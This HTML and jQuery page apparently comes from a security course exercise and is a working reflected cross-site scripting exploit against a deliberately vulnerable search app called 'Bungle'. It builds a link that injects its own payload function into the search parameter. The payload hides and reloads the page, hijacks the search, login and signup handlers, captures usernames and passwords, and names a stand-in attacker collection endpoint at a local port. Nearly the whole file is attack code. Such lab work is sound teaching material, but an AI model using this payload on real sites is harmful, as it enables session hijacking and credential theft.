<meta charset="utf-8"><script src="http://ajax.googleapis.com/ajax/libs/jquery

1. <meta charset="utf-8">
2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
3. <script>
4. function payload(attacker) {
5. function log(data) {
6. alert(data);
7. //console.log(data);
8. //console.log($.param(data));
9. }
10. function proxy(href) {
11. log(href);
12. $("html").load(href, function(){
13. $("html").show();
14.  
15. $("#query").val("pwned!");
16.  
17. $("#bungle-lnk, #search-again-btn").click(function(e) {
18. e.preventDefault();
19. proxy("./");
20. });
21.  
22. $("#search-btn").click(function(e) {
23. e.preventDefault();
24. var search = $("#query").val();
25. proxy("./search?q=" + search);
26. });
27.  
28. $(".history-item").click(function(e) {
29. var url = $(this).attr("href");
30. e.preventDefault();
31. proxy(url);
32. });
33.  
34. $("#log-in-btn").click(function(e) {
35. e.preventDefault();
36. var username = $("#username").val();
37. var userpass = $("#userpass").val();
38. $.ajax({
39. type: "POST",
40. url: "http://trurl.cs.illinois.edu/login",
41. dataType: "text",
42. data: {
43. username: username,
44. password: userpass
45. },
46. success: function(){
47. proxy("./");
48. }
49. });
50. });
51.  
52. $("#new-account-btn").click(function(e) {
53. e.preventDefault();
54. var username = $("#username").val();
55. var userpass = $("#userpass").val();
56. $.ajax({
57. type: "POST",
58. url: "http://trurl.cs.illinois.edu/create",
59. dataType: "text",
60. data: {
61. username: username,
62. password: userpass
63. },
64. success: function(){
65. $.ajax({
66. type: "POST",
67. url: "http://trurl.cs.illinois.edu/login",
68. dataType: "text",
69. data: {
70. username: username,
71. password: userpass
72. },
73. success: function(){
74. proxy("./");
75. }
76. });
77. }
78. });
79. });
80.  
81. $("#log-out-btn").click(function(e) {
82. e.preventDefault();
83. $.ajax({
84. type: "POST",
85. url: "http://trurl.cs.illinois.edu/logout",
86. success: function(){
87. proxy("./");
88. }
89. });
90. });
91. });
92. }
93. $("html").hide();
94. proxy("./");
95. }
96.  
97. function makeLink(xssdefense, target, attacker) {
98. if (xssdefense == 0) {
99. payload(attacker);
100. return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<" + "/script>");
101. }
102. }
103.  
104. var xssdefense = 0;
105. var target = "http://trurl.cs.illinois.edu/";
106. var attacker = "http://127.0.0.1:31337/stolen";
107.  
108. $(function() {
109. var url = makeLink(xssdefense, target, attacker);
110. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
111. });
112. </script>
113.  
114. <h3></h3>